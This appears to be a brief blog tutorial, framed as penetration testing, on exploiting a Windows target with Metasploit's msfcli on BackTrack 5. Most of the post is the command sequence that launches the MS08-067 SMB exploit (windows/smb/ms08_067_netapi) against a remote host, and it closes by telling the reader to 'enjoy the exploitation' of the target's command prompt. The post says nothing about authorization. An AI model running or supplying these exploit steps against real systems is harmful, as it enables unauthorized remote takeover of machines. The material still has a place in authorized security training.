After we discover the target’s information, description, open ports, and vulnerabilitites, now we can start to exploit the target. This step is practically finalizes the penetration testing. Because it is a test to a target to discover wether the target can be exploited or not.


In this demonstration I use “metasploit”


Try to follow this step with me:


First of all you have to download the backtrack 5 from the internet. You can have it at


Run the following commands:

# cd /pentest/exploits/framework/

# ./msfcli -h

# ./msfcli windows/smb/ms08_067_netapi O

# ./msfcli windows/smb/ms08_067_netapi RHOST= P

# ./msfcli windows/smb/ms08_067_netapi RHOST=





And now you already connected with your target’s command prompt 🙂 enjoy the exploitation



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s